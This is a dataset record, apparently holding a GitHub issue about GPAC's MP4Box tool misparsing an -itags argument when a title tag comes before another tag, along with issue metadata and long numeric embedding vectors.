-0.000648296088911593, 0.012414676137268543, 0.02347841113805771, -0.009759379550814629, -0.007352531887590885, -0.015698859468102455, 0.010605658404529095, 0.011840138584375381 ]
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [X] I looked for a similar issue and couldn't find any. - [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ How to reproduce: MP4Box -itags title="Some title":gen=Genre test.mp4 MP4Box -info test.mp4 Shows tag title has value **Some title:gen=Genre** Issue is the same omitting quotes (ie MP4Box -itags title=Sometitle:gen=Genre test.mp4 has the same problem) However MP4Box -itags gen=Genre:title="Some title" test.mp4 works fine.
MP4Box itags string parsing issue with @tag
https://api.github.com/repos/gpac/gpac/issues/2031/comments
1
2022-01-05T03:33:23
2022-01-05T09:21:39Z
https://github.com/gpac/gpac/issues/2031
1,093,946,502
2,031
false
This is a GitHub Issue repo:gpac owner:gpac Title : MP4Box itags string parsing issue with @tag Issue date: --- start body --- Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [X] I looked for a similar issue and couldn't find any. - [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ How to reproduce: MP4Box -itags title="Some title":gen=Genre test.mp4 MP4Box -info test.mp4 Shows tag title has value **Some title:gen=Genre** Issue is the same omitting quotes (ie MP4Box -itags title=Sometitle:gen=Genre test.mp4 has the same problem) However MP4Box -itags gen=Genre:title="Some title" test.mp4 works fine. --- end body ---
1,180
[ -0.016813386231660843, 0.03924626111984253, -0.019532978534698486, 0.007095729932188988, 0.011839990504086018, 0.02850312367081642, -0.028458047658205032, 0.034167688339948654, -0.045857422053813934, 0.00602892879396677, -0.0032943119294941425, -0.011126285418868065, 0.02527266927063465, 0.026053989306092262, -0.020359374582767487, 0.00456771207973361, 0.005412888713181019, 0.016182322055101395, -0.039546769112348557, -0.007294816430658102, 0.033746976405382156, -0.006592380348592997, -0.020870236679911613, 0.02875855565071106, -0.006415832322090864, 0.012350852601230145, -0.029314493760466576, 0.025993887335062027, 0.023770133033394814, -0.0014368008123710752, -0.0074300444684922695, 0.009007708169519901, 0.010224763303995132, 0.029975609853863716, 0.05730675533413887, 0.005953802261501551, 0.018616430461406708, 0.09081332385540009, -0.026880383491516113, 0.02050962671637535, -0.01906719245016575, -0.051657214760780334, -0.0455869659781456, 0.03906595706939697, -0.023229219019412994, 0.03906595706939697, -0.008241414092481136, -0.02246292494237423, -0.04459529370069504, -0.019758358597755432, -0.0039929915219545364, -0.02788708359003067, -0.013575419783592224, -0.01636262610554695, -0.0020246682688593864, -0.021906986832618713, 0.013530343770980835, -0.018661506474018097, -0.016678158193826675, 0.053850919008255005, -0.028277743607759476, 0.013102120719850063, -0.046728894114494324, 0.018886888399720192, 0.03203408420085907, -0.0033694389276206493, -0.019713282585144043, 0.003453956451267004, -0.008091161027550697, 0.017128920182585716, 0.023935411125421524, -0.018661506474018097, 0.01091593038290739, 0.03753336891531944, 0.034077536314725876, -0.06809496879577637, 0.044114481657743454, 0.009548621252179146, -0.009120398201048374, 0.049794070422649384, -0.039546769112348557, 0.020780084654688835, -0.025618253275752068, 0.0033675606828182936, -0.012193086557090282, -0.005010960157960653, -0.01996871456503868, -0.053069598972797394, -0.021786784753203392, -0.027646677568554878, -0.01495775394141674, 0.032635100185871124, -0.004770554602146149, -0.02647469937801361, 0.005664563737809658, -0.0022350235376507044, 0.009481007233262062, 0.020404450595378876, -0.04231143742799759, -0.031553272157907486, -0.00847430806607008, -0.037232860922813416, -0.014702322892844677, -0.022898660972714424, 0.005119894165545702, 0.0017805061070248485, 0.017309224233031273, -0.025543125346302986, -0.0026256830897182226, 0.11839990317821503, 0.010683036409318447, 0.01699369214475155, -0.016182322055101395, -0.0013006334193050861, 0.008879992179572582, 0.015986992046236992, -0.005837355740368366, -0.05394107103347778, -0.03555002063512802, 0.021185768768191338, -0.022477950900793076, -0.011779888533055782, -0.025302719324827194, -0.008091161027550697, -0.028653377667069435, 0.032755304127931595, -0.018496228381991386, -0.022387798875570297, 0.00505603663623333, -0.0188568364828825, -0.06515000015497208, 0.001422714558430016, 0.01857135444879532, -0.0018406076123937964, 0.001740125473588705, 0.020284246653318405, -0.04153011739253998, -0.0188568364828825, -0.008173800073564053, -0.019112268462777138, -0.07097984105348587, -0.04934331029653549, 0.0402078852057457, 0.006351974327117205, -0.05051528662443161, -0.020704956725239754, 0.008887505158782005, 0.016107194125652313, -0.03302576020359993, 0.007144562434405088, -0.0013269277988001704, -0.039546769112348557, 0.021651554852724075, 0.002409693319350481, 0.03545986860990524, 0.01798536628484726, 0.01827084831893444, -0.010051971301436424, -0.005675832740962505, -0.006502228323370218, -0.03215428814291954, -0.025918759405612946, 0.0015861154533922672, -0.003607966471463442, -0.0013241105480119586, -0.024386173114180565, 0.027286069467663765, 0.03368687629699707, -0.005138676147907972, 0.017309224233031273, -0.015325875952839851, 0.003514057956635952, 0.04201092943549156, -0.0011109381448477507, -0.021020490676164627, -0.03344646841287613, 0.01133664045482874, 0.034077536314725876, -0.04615793004631996, 0.017264148220419884, -0.040418241173028946, 0.02114069275557995, -0.010983544401824474, -0.010450143367052078, 0.00839166808873415, -0.006419588346034288, 0.030306167900562286, -0.012178060598671436, 0.061513856053352356, -0.014717347919940948, -0.002075379015877843, 0.028773579746484756, -0.009007708169519901, -0.03003571182489395, 0.04708950221538544, 0.0033544134348630905, -0.02984038181602955, -0.036782100796699524, -0.015731560066342354, -0.012463542632758617, 0.031433071941137314, -0.01330496370792389, 0.011118772439658642, -0.03485885262489319, -0.014491967856884003, 0.013770749792456627, -0.00793339405208826, 0.0455869659781456, 0.002556190825998783, 0.0060477107763290405, -0.052558738738298416, -0.024010539054870605, 0.051446862518787384, 0.01519064698368311, -0.016332576051354408, 0.012921816669404507, 0.0009367378079332411, -0.009037759155035019, -0.011562020517885685, -0.008188826031982899, 0.030606675893068314, -0.0032492359168827534, 0.0015100494492799044, -0.007373699452728033, 0.009248114190995693, -0.019653182476758957, -0.00590496975928545, -0.022147392854094505, -0.027316119521856308, 0.027361195534467697, 0.028202615678310394, 0.006889131385833025, -0.017294198274612427, -0.005127406679093838, 0.009789027273654938, 0.015611357986927032, -0.005946289282292128, -0.0026256830897182226, 0.0006953928386792541, -0.002789083868265152, 0.0044775595888495445, 0.024205869063735008, -0.042461689561605453, 0.0022519270423799753, 0.028563225641846657, 0.05562391132116318, 0.011178874410688877, -0.023364447057247162, -0.005360300187021494, 0.04711955413222313, -0.01331998873502016, -0.02614414133131504, 0.012132984586060047, 0.0005794157623313367, 0.007298572454601526, 0.04153011739253998, 0.027826981619000435, 0.025618253275752068, 0.011359178461134434, -0.027661703526973724, 0.017955314368009567, 0.04594757780432701, -0.00396669702604413, -0.012313289567828178, 0.02399551309645176, -0.0402078852057457, -0.011847502551972866, -0.03140302002429962, -0.023304346948862076, -0.010683036409318447, -0.013755724765360355, -0.015896840021014214, -0.02010394260287285, 0.028443021699786186, -0.049163006246089935, 0.00590496975928545, 0.026519775390625, -0.009443444199860096, 0.02171165682375431, -0.011614609509706497, -0.011186386458575726, 0.02842799760401249, 0.026008913293480873, 0.044685445725917816, 0.010840803384780884, 0.010525270365178585, 0.002646343084052205, 0.012981917709112167, -0.02800728566944599, -0.0024622823111712933, 0.034498244524002075, 0.05030493438243866, 0.006344461813569069, 0.03194393217563629, -0.030982309952378273, 0.02050962671637535, 0.012666385620832443, -0.013079582713544369, 0.021786784753203392, 0.011599584482610226, -0.01241095457226038, 0.02022414654493332, -0.009075322188436985, -0.005469234194606543, -0.016467804089188576, 0.043032653629779816, -0.0011719787726178765, 0.01855633035302162, -0.03248484432697296, 0.0038878140039741993, 0.02677520550787449, -0.043904125690460205, -0.034047484397888184, 0.023695005103945732, -0.01475491188466549, -0.014341713860630989, 0.006874105893075466, -0.03024606592953205, -0.03446819633245468, -0.006528522353619337, 0.020870236679911613, -0.010262326337397099, -0.010382529348134995, -0.0071483189240098, -0.00020096430671401322, 0.00006755546201020479, -0.02722596749663353, 0.004594006109982729, 0.001923247124068439, 0.005033498164266348, -0.017369326204061508, 0.026294393464922905, 0.03182372823357582, -0.0167833361774683, 0.0008437683572992682, -0.028277743607759476, -0.012711461633443832, -0.007227201946079731, 0.037353064864873886, -0.04222128540277481, -0.025017237290740013, 0.060972943902015686, 0.020164044573903084, 0.015431053005158901, -0.008985170163214207, -0.027571551501750946, -0.010683036409318447, 0.020269222557544708, 0.026053989306092262, -0.004871975630521774, 0.0009559890604577959, 0.0078732930123806, 0.0023852773010730743, 0.011314102448523045, -0.018285872414708138, -0.017669832333922386, 0.006378268823027611, -0.018946988508105278, 0.027992261573672295, 0.030892157927155495, 0.000818882544990629, -0.05282919481396675, -0.019427800551056862, 0.0054617212153971195, 0.01331998873502016, 0.011269026435911655, -0.02680525742471218, -0.010420093312859535, -0.025633277371525764, -0.033296216279268265, 0.002828525612130761, 0.0045376610942184925, -0.054061274975538254, 0.008278978057205677, -0.023484650999307632, 0.002926190383732319, 0.016888514161109924, 0.024311045184731483, -0.0059688277542591095, 0.0132598876953125, -0.033626772463321686, -0.00166499859187752, 0.013567907735705376, -0.06436868011951447, -0.04483569785952568, 0.02022414654493332, 0.0008658368606120348, 0.03332626819610596, -0.007843242026865482, -0.027586575597524643, -0.01166719850152731, 0.059981271624565125, -0.0196832325309515, -0.04687914997339249, -0.06109314784407616, 0.0360608845949173, -0.026369521394371986, -0.02817256562411785, 0.010277352295815945, -0.006261822301894426, 0.06965760886669159, -0.02706068754196167, 0.008136237040162086, 0.04450514167547226, -0.02076505869626999, 0.02109561674296856, -0.02663997747004032, -0.010607910342514515, 0.009661312215030193, -0.010607910342514515, 0.0028059876058250666, 0.005965071264654398, 0.022823534905910492, -0.02192201279103756, 0.02208729088306427, -0.0010020042536780238, 0.0076704504899680614, 0.02642962336540222, -0.038314688950777054, 0.03816443681716919, 0.011637147516012192, -0.015017855912446976, -0.002122333273291588, -0.008263952098786831, 0.02991550788283348, 0.009345779195427895, -0.010675524361431599, 0.0005808243877254426, 0.03389723226428032, -0.024671655148267746, 0.005796035751700401, -0.05421152710914612, 0.0028736016247421503, -0.005555629730224609, 0.003970453515648842, -0.020780084654688835, -0.036030832678079605, -0.008226389065384865, -0.005281416699290276, 0.023214193060994148, -0.029059061780571938, 0.002909286879003048, -0.0070919739082455635, 0.017083844169974327, 0.04339326173067093, -0.012666385620832443, -0.018841812387108803, -0.020960388705134392, -0.007516440469771624, 0.009721413254737854, 0.008925069123506546, 0.018706584349274635, -0.010728113353252411, -0.0008184130419977009, 0.002015277510508895, 0.00016997447528410703, -0.009045272134244442, -0.015077956952154636, 0.04285234957933426, 0.012966892682015896, -0.012666385620832443, -0.013462729752063751, -0.011967705562710762, -0.001955176005139947, 0.04901275038719177, -0.0037976617459207773, 0.002075379015877843, -0.018391050398349762, 0.022943736985325813, -0.001347587676718831, -0.005983852781355381, -0.011269026435911655, 0.004038067534565926, 0.024746781215071678, -0.025242619216442108, 0.04207102954387665, -0.006738877855241299, -0.007820704020559788, 0.03476870059967041, -0.0397871732711792, 0.010329940356314182, -0.010607910342514515, 0.022072266787290573, 0.022943736985325813, 0.0004148410225752741, -0.0010790092637762427, 0.0013381968019530177, -0.045556917786598206, -0.0071520754136145115, 0.02527266927063465, 0.004229641053825617, 0.040929101407527924, 0.012749024666845798, -0.013845876790583134, 0.011697249487042427, 0.012643847614526749, -0.01753460429608822, -0.017249122262001038, 0.026008913293480873, 0.0004836290318053216, 0.02062983065843582, 0.01344770472496748, -0.0011419280199334025, 0.033626772463321686, 0.08155769854784012, -0.03990737721323967, -0.02573845535516739, 0.0418606773018837, 0.012245675548911095, 0.002939337631687522, -0.03594068065285683, -0.027286069467663765, -0.014229023829102516, -0.03858514502644539, -0.002858576364815235, -0.008571972139179707, 0.0022087290417402983, 0.011674711480736732, 0.004826899617910385, -0.011411767452955246, -0.024220893159508705, -0.02581358328461647, -0.0076103489845991135, 0.01649785414338112, -0.023109016939997673, 0.018000390380620956, -0.022342722862958908, -0.003929133992642164, 0.00754273496568203, -0.0014555825619027019, -0.017369326204061508, -0.013845876790583134, -0.0037018749862909317, 0.008932581171393394, -0.017474502325057983, 0.027917133644223213, -0.008789840154349804, 0.007298572454601526, -0.009248114190995693, 0.002907408867031336, -0.028953883796930313, 0.05009457841515541, -0.053430210798978806, 0.037773776799440384, 0.013815825805068016, 0.029599975794553757, -0.026084039360284805, 0.01619734615087509, 0.0003120111650787294, -0.028157539665699005, -0.008354105055332184, -0.013658059760928154, 0.013477755710482597, 0.036241188645362854, -0.0009146693046204746, 0.03179368004202843, -0.015926890075206757, 0.031192664057016373, -0.010743138380348682, -0.013905977830290794, -0.01303450670093298, 0.02093033865094185, 0.01579166203737259, 0.0002559008134994656, 0.007640399970114231, 0.014491967856884003, 0.010803239420056343, -0.003617357462644577, -0.02187693677842617, -0.015401002019643784, 0.005195021163672209, 0.0005784766981378198, 0.00938334222882986, -0.009413393214344978, -0.006757659371942282, 0.00034769641933962703, 0.037984129041433334, 0.00294309388846159, -0.008699688129127026, -0.018721608445048332, 0.0000929107700358145, -0.03512931242585182, -0.017594706267118454, 0.00048785493709146976, 0.02991550788283348, -0.011374203488230705, 0.002435987815260887, 0.009390855208039284, -0.029074087738990784, 0.012996943667531013, -0.011171361431479454, 0.022763432934880257, -0.011141310445964336, -0.0188568364828825, 0.01021725032478571, 0.007745577488094568, -0.026504749432206154, 0.021035514771938324, 0.061844415962696075, -0.0038840577472001314, -0.005071061663329601, 0.055924419313669205, -0.00579227926209569, 0.016272474080324173, -0.04714960604906082, -0.003944159019738436, 0.01355288177728653, -0.033416420221328735, 0.002909286879003048, 0.04360361769795418, -0.0032323324121534824, 0.020780084654688835, 0.02163653075695038, -0.017128920182585716, 0.011855015531182289, 0.013936028815805912, 0.018391050398349762, -0.00028712538187392056, -0.0049170516431331635, -0.0015494910767301917, 0.02324424497783184, -0.03476870059967041, 0.03717276081442833, -0.03278535231947899, -0.022823534905910492, 0.01926252245903015, 0.009864154271781445, -0.021531352773308754, 0.0015260139480233192, -0.01876668445765972, -0.024882009252905846, 0.0601014718413353, -0.024386173114180565, -0.027240993455052376, -0.017955314368009567, 0.006374512333422899, -0.000348635483533144, 0.0093232411891222, 0.00593502027913928, 0.006209233310073614, -0.00015952714602462947, -0.0010339331347495317, 0.00257497257553041, 0.02142617478966713, -0.015108007937669754, 0.010750651359558105, 0.00961623527109623, -0.009864154271781445, 0.018300898373126984, 0.012125472538173199, -0.017294198274612427, -0.0052626351825892925, -0.0068252733908593655, 0.017294198274612427, 0.02208729088306427, -0.015250748954713345, 0.0018509374931454659, 0.024641603231430054, -0.00684781139716506, 0.0024453785736113787, 0.015340900979936123, -0.016648108139634132, 0.0033825859427452087, -0.03170352801680565, 0.014394302852451801, 0.035249512642621994, -0.0027796931099146605, 0.005266391672194004, 0.0029750228859484196, 0.008677150122821331, 0.013049532659351826, -0.03218434005975723, 0.03038129396736622, -0.011456843465566635, -0.007910856045782566, -0.013312476687133312, -0.006551060359925032, -0.014980291947722435, -0.01280161365866661, -0.009503545239567757, -0.007985983043909073, -0.009496032260358334, -0.031643424183130264, 0.0001035928726196289, 0.001076192012988031, 0.0049433461390435696, -0.01373318675905466, -0.008376643061637878, 0.000012684990906564053, -0.003825834486633539, 0.0031440583989024162, 0.011824964545667171, -0.006998065393418074, 0.025753481313586235, -0.0043798950500786304, -0.01462719589471817, 0.019833486527204514, 0.010622935369610786, -0.018345974385738373, 0.005379081703722477, -0.022237544879317284, 0.003033246146515012, -0.0018255822360515594, -0.0236198790371418, -0.007437557447701693, -0.005033498164266348, 0.008632074110209942, 0.0006329436437226832, 0.012951867654919624, -0.002150505781173706, -0.010284864343702793, 0.01843612641096115, 0.00853440910577774, 0.03585052862763405, -0.002467916812747717, -0.00348025094717741, 0.003014464396983385, -0.015596332028508186, -0.027316119521856308, 0.01996871456503868, -0.006524766329675913, -0.021846884861588478, -0.02166658081114292, -0.00016410519310738891, 0.0052025336772203445, -0.002167409285902977, -0.0004678993427660316, 0.027376221492886543, 0.01699369214475155, -0.001409567310474813, -0.06677273660898209, -0.013425166718661785, 0.013079582713544369, 0.011847502551972866, -0.0028210128657519817, 0.004492585081607103, -0.019052166491746902, -0.019743334501981735, 0.01054780837148428, 0.017309224233031273, -0.0003561481717042625, 0.013620496727526188, -0.02896890975534916, -0.006915425881743431, 0.005946289282292128, 0.015806687995791435, 0.019863536581397057, -0.008451770059764385, -0.016137246042490005, -0.010810752399265766, 0.025693379342556, 0.001955176005139947, -0.0003951202379539609, -0.020539678633213043, 0.0011607096530497074, 0.002909286879003048, 0.022688306868076324, -0.036030832678079605, 0.020915312692523003, -0.03927631303668022, -0.005296442192047834, -0.028022311627864838, -0.015671459957957268, -0.00609278678894043, -0.0068327863700687885, -0.016347600147128105, -0.0037169004790484905, -0.010179687291383743, 0.010382529348134995, 0.0016114707104861736, 0.008752277120947838, -0.010825777426362038, -0.026008913293480873, -0.012981917709112167, 0.02453642711043358, -0.019698258489370346, -0.0267301294952631, 0.019758358597755432, -0.005285173188894987, -0.0275565255433321, -0.030140887945890427, -0.003677458968013525, -0.03485885262489319, 0.0035797939635813236, 0.020780084654688835, -0.005950045771896839, 0.03867529705166817, -0.014168921858072281, -0.002665124600753188, -0.004853194113820791, 0.000710418215021491, -0.0066261873580515385, 0.02059978060424328, -0.003726291237398982, 0.016557956114411354, -0.01918739452958107, 0.02204221487045288, -0.00020096430671401322, 0.00012947642244398594, 0.006134106777608395, -0.029404645785689354, 0.0002979248820338398, 0.00998435728251934, -0.02660992741584778, -0.016467804089188576, -0.036902304738759995, -0.026504749432206154, 0.02630941942334175, -0.02510739117860794, 0.014221510849893093, -0.001998374005779624, 0.02270333096385002, 0.020374398678541183, 0.0010574102634564042, -0.0028642108663916588, 0.01288425363600254, 0.01794029027223587, -0.013673084788024426, -0.015160596929490566, 0.0426720455288887, -0.027826981619000435, 0.001181369530968368, 0.006528522353619337, -0.02543794922530651, 0.03024606592953205, -0.01744445227086544, -0.008414206095039845, 0.004515123087912798, 0.015243235975503922, 0.009203038178384304, -0.01723409816622734, -0.016813386231660843, -0.021035514771938324, -0.026534799486398697, -0.030216015875339508, -0.009789027273654938, 0.014033693820238113, 0.00381832174025476, -0.0036567989736795425, 0.018466178327798843, -0.03597073256969452, 0.01311714667826891, -0.036030832678079605, -0.011344153434038162, -0.0030088298954069614, -0.0005841111997142434, -0.01106618344783783, 0.008031059056520462, -0.0030182208865880966, 0.03152322396636009, -0.002225632779300213, 0.00936831720173359, 0.010803239420056343, 0.02929946780204773, -0.007264765445142984, 0.012816638685762882, -0.030771953985095024, -0.0006860019639134407, 0.004470047075301409, -0.014822525903582573, 0.0167833361774683, 0.017429426312446594, -0.018992064520716667, -0.00599887827411294, 0.006998065393418074, -0.02374008111655712, 0.014649733901023865, -0.054061274975538254, 0.0005949106998741627, -0.018090544268488884, -0.028518149629235268, -0.03173357620835304, 0.010262326337397099, 0.027496423572301865, -0.0045376610942184925, 0.025062313303351402, 0.005078574642539024, -0.012606283649802208, -0.0198935866355896, 0.010127098299562931, -0.014747398905456066, 0.0052438536658883095, -0.009864154271781445, -0.002405937062576413, 0.011494406498968601, -0.00311776390299201, 0.012974405661225319, -0.01824079640209675, -0.0410192534327507, -0.005097356159240007, 0.0071483189240098, -0.007193394936621189, -0.02937459573149681, 0.004120707046240568, -0.023710031062364578, 0.029284441843628883, -0.01176486350595951, -0.052107978612184525, 0.009691362269222736, -0.01890191249549389, -0.007753090001642704, -0.028127489611506462, 0.008692175149917603, -0.006648725364357233, -0.004503854084759951, -0.032965656369924545, 0.007245983928442001, 0.0024265970569103956, -0.0075502474792301655, 0.011599584482610226, 0.021125666797161102, -0.005454208701848984, -0.0011099990224465728, -0.008339079096913338, -0.031102512031793594, -0.038975805044174194, -0.03600078076124191, -0.0008747581741772592, 0.01456709485501051, 0.06677273660898209, -0.029029011726379395, -0.0032436014153063297, -0.005131163168698549, 0.01500282995402813, 0.011058671399950981, -0.03033621795475483, -0.013890952803194523, -0.0004237623361404985, 0.006554816849529743, 0.0024303533136844635, 0.02076505869626999, -0.03380708023905754, 0.0030557841528207064, 0.02038942463696003, 0.011118772439658642, -0.005506797228008509, -0.01259877160191536, -0.00927816517651081, 0.006025172770023346, -0.04005763307213783, -0.007723039481788874, 0.03753336891531944, -0.005491772200912237, -0.05213802680373192, 0.009067810140550137, 0.03182372823357582, -0.0075502474792301655, -0.014063744805753231, -0.015363438986241817, -0.025678353384137154, -0.012771562673151493, -0.005007204134017229, -0.043904125690460205, -0.040959153324365616, -0.01021725032478571, 0.03846494108438492, -0.02694048546254635, -0.03095225803554058, -0.0012076640268787742, 0.027090739458799362, -0.012012781575322151, 0.0078732930123806, -0.019998764619231224, -0.003360047936439514, 0.001972079509869218, 0.012568720616400242, -0.013440191745758057, 0.02557317726314068, -0.023514701053500175, -0.01918739452958107, -0.0014480698155239224, -0.018796736374497414, -0.033746976405382156, 0.023424549028277397, 0.008639587089419365, 0.024626579135656357, -0.02150130271911621, -0.013425166718661785, -0.004436240065842867, -0.012425979599356651, -0.008752277120947838, -0.05856888368725777, -0.0049771531485021114, -0.014664758928120136, 0.006438370328396559, -0.01640770211815834, -0.006449639331549406, 0.024461299180984497, -0.007880805991590023, 0.022523026913404465, 0.03311591222882271, 0.0074713644571602345, -0.007903343997895718, -0.026489723473787308, 0.05183751881122589, -0.013124658726155758, 0.017098868265748024, 0.003666189732030034, -0.01228323858231306, -0.021937036886811256, -0.03915610909461975, 0.01570151001214981, 0.011704761534929276, 0.021771758794784546, 0.000159174989676103, 0.03281540423631668, 0.016062118113040924, 0.008466795086860657, -0.01927754655480385, -0.008429231122136116, -0.0039366465061903, 0.010465169325470924, 0.015506180003285408, 0.0015401002019643784, -0.014634708873927593, 0.02138109877705574, -0.01765480823814869, -0.0031628399156033993, -0.002819134620949626, 0.03555002063512802, -0.021516326814889908, 0.0008193521061912179, -0.018796736374497414, 0.000025487368475296535, -0.00571715272963047, 0.028848707675933838, -0.006829029880464077, -0.0032191851641982794, 0.013725673779845238, 0.017684858292341232, 0.014431865885853767, -0.0013588567962870002, 0.00406060554087162, 0.014349226839840412, -0.010337453335523605, -0.012891765683889389, -0.009075322188436985, -0.018180696293711662, -0.004049336537718773, -0.007193394936621189, 0.041920777410268784, -0.011381716467440128, -0.020028816536068916, -0.031553272157907486, 0.000004141513727518031, 0.008977657184004784, 0.006400806829333305, 0.030802004039287567, 0.009338266216218472, 0.002678271848708391, -0.0002866558497771621, -0.008256440050899982, 0.049163006246089935, -0.016678158193826675, 0.0012489837827160954, -0.0056608072482049465, -0.008173800073564053, -0.00927816517651081, 0.014649733901023865, 0.015401002019643784, 0.0028604543767869473, -0.027000587433576584, 0.009638773277401924, -0.020750032737851143, -0.016422728076577187, -0.013282425701618195, 0.007001821417361498, 0.0167833361774683, -0.00527390418574214, -0.008752277120947838, 0.005611975211650133, 0.0015964453341439366, -0.0034727382007986307, -0.010517757385969162, 0.017850138247013092, -0.011922629550099373, 0.0028435508720576763, -0.022072266787290573, -0.00314969290047884, -0.005431670695543289, -0.014116333797574043, -0.0176097322255373, -0.014950240962207317, 0.003540352452546358, -0.04384402558207512, 0.005352787207812071, -0.0033863424323499203, -0.00593502027913928, 0.010540295392274857, -0.030486471951007843, -0.016467804089188576, -0.017519580200314522, -0.009218063205480576, -0.038975805044174194, -0.018000390380620956, -0.004432483576238155, 0.019502928480505943, 0.03633134067058563, 0.04375387355685234, -0.013192273676395416, -0.02050962671637535, -0.03588058054447174, 0.00030567232170142233, -0.0012518010335043073, 0.01008953433483839, 0.01373318675905466, -0.0019795922562479973, 0.01914231851696968, 0.013898465782403946, -0.03353662043809891, 0.008361617103219032, 0.034738652408123016, 0.006821517366915941, -0.026294393464922905, 0.013673084788024426, 0.0314931720495224, 0.03825458884239197, -0.0026989318430423737, 0.010938468389213085, 0.034588396549224854, 0.00005106277603772469, 0.007614105474203825, -0.021516326814889908, 0.011058671399950981, 0.007903343997895718, -0.002573094330728054, 0.004285986069589853, 0.00876730214804411, -0.015731560066342354, -0.0043385750614106655, 0.0022631960455328226, 0.013770749792456627, -0.00824892707169056, 0.004004260525107384, -0.02395043708384037, 0.010149636305868626, -0.02680525742471218, 0.017955314368009567, 0.015235722996294498, 0.0043986765667796135, 0.002419084310531616, 0.005018473137170076, -0.028563225641846657, 0.020118968561291695, 0.0019570542499423027, 0.0008104307926259935, -0.01274151261895895, 0.013643034733831882, -0.048171330243349075, 0.00023852771846577525, 0.05367061495780945, -0.01195268053561449, 0.014657246880233288, 0.00037774714292027056, -0.00499217864125967, -0.0032623831648379564, -0.007061922922730446, -0.014078769832849503, -0.010713087394833565, 0.033176012337207794, -0.003619235474616289, 0.03057662397623062, 0.013064557686448097, -0.010540295392274857, 0.026955511420965195, -0.0031327891629189253, 0.01893196441233158, 0.010157149285078049, -0.006678776349872351, 0.012531156651675701, 0.0001378107990603894, 0.01591186411678791, 0.03576037660241127, 0.003696240484714508, 0.01711389422416687, -0.02746637351810932, -0.013943541795015335, 0.008744764141738415, 0.020524652674794197, -0.005281416699290276, 0.014221510849893093, -0.016272474080324173, 0.030892157927155495, 0.0093232411891222, 0.008128724060952663, -0.015070443972945213, -0.022282620891928673, -0.021155718713998795, -0.001076192012988031, 0.044114481657743454, 0.013350039720535278, -0.0004939589998684824, 0.03891570493578911, -0.012951867654919624, -0.004116951022297144, -0.003951671998947859, -0.008797353133559227, 0.0067050703801214695, 0.004364869557321072, 0.011607096530497074, 0.006475933827459812, -0.022312670946121216, 0.004500097595155239, 0.01008953433483839, 0.00782821699976921, 0.0048569501377642155, 0.004372382070869207, -0.032514896243810654, 0.0021711657755076885, -0.01331998873502016, -0.021891960874199867, -0.001288425293751061, -0.02540789730846882, -0.047420062124729156, 0.0016715722158551216, 0.02515246719121933, -0.01669318415224552, -0.019082218408584595, -0.016332576051354408, 0.031973984092473984, 0.005709639750421047, 0.0052626351825892925, -0.021621504798531532, -0.006922938395291567, 0.014950240962207317, 0.034047484397888184, -0.012433492578566074, 0.028367895632982254, 0.019367700442671776, 0.012749024666845798, 0.018135620281100273, 0.01443937886506319, -0.015731560066342354, 0.012155522592365742, 0.0013419531751424074, -0.0011325371451675892, -0.005822330247610807, 0.002437866060063243, 0.029720177873969078, 0.025122415274381638, 0.012223136611282825, 0.00566832022741437, -0.0013250496704131365, -0.017594706267118454, -0.0006864715251140296, 0.007137049920856953, 0.013522831723093987, -0.003902839496731758, 0.006693801376968622, 0.013169735670089722, 0.024100691080093384, 0.007655424997210503, -0.00406060554087162, 0.0012405319139361382, -0.010104560293257236, -0.02540789730846882, 0.023349422961473465, 0.008008521050214767, 0.023815209046006203, 0.014476941898465157, 0.0040192860178649426, -0.004672889597713947, 0.0238302331417799, 0.01274151261895895, -0.04471549764275551, -0.010893392376601696, -0.004819386638700962, 0.008369130082428455, 0.019863536581397057, -0.012208111584186554, -0.0016546687111258507, 0.006043954286724329, 0.030200989916920662, -0.010344966314733028, -0.015896840021014214, -0.014544556848704815, -0.014619682915508747, 0.005439183209091425, 0.024746781215071678, -0.0356401726603508, 0.012050345540046692, 0.02283855900168419, -0.02142617478966713, 0.010104560293257236, -0.009172987192869186, -0.04955366253852844, 0.013139684684574604, 0.000696331902872771, 0.029569923877716064, -0.013545369729399681, 0.003407002193853259, -0.025753481313586235, -0.009458469226956367, 0.01124648842960596, -0.0020979170221835375, -0.0021711657755076885, 0.002819134620949626, -0.0014405571855604649, 0.023965463042259216, -0.003224819665774703, 0.004466290585696697, 0.0082864910364151, -0.029990635812282562, 0.0007658242247998714, -0.0025111145805567503, -0.022973788902163506, 0.004631569609045982, 0.008218876086175442, -0.01452201884239912, 0.01959308050572872, 0.0021730437874794006, 0.0015307094436138868, -0.0138834398239851, 0.0176097322255373, -0.030396319925785065, 0.004252179060131311, 0.005330249201506376, -0.010021920315921307, 0.012628821656107903, -0.011193899437785149, -0.024476325139403343, -0.012358365580439568, -0.009263139218091965, 0.02826271764934063, -0.013102120719850063, -0.002678271848708391, -0.004368625581264496, 0.019668206572532654, 0.018826786428689957, 0.022523026913404465, 0.00023265843628905714, -0.014281612820923328, 0.005236340686678886, -0.00442497106269002, -0.014386789873242378, 0.010660498403012753, -0.040628597140312195, -0.008008521050214767, -0.004672889597713947, -0.009706388227641582, -0.007373699452728033, -0.017669832333922386, -0.0002533183142077178, 0.014003642834722996, 0.022117342799901962, 0.0020997952669858932, 0.005518066696822643, -0.005769741255789995, 0.010495219379663467, 0.0010236032539978623, 0.0014217754360288382, 0.0055819242261350155, 0.02093033865094185, 0.007174613419920206, 0.004162027034908533, 0.021982112899422646, 0.002496089320629835, 0.014845063909888268, -0.0051236506551504135, -0.013057044707238674, 0.016933590173721313, -0.023063940927386284, 0.01645277813076973, -0.024641603231430054, -0.007418775465339422, -0.025708405300974846, 0.007013090420514345, 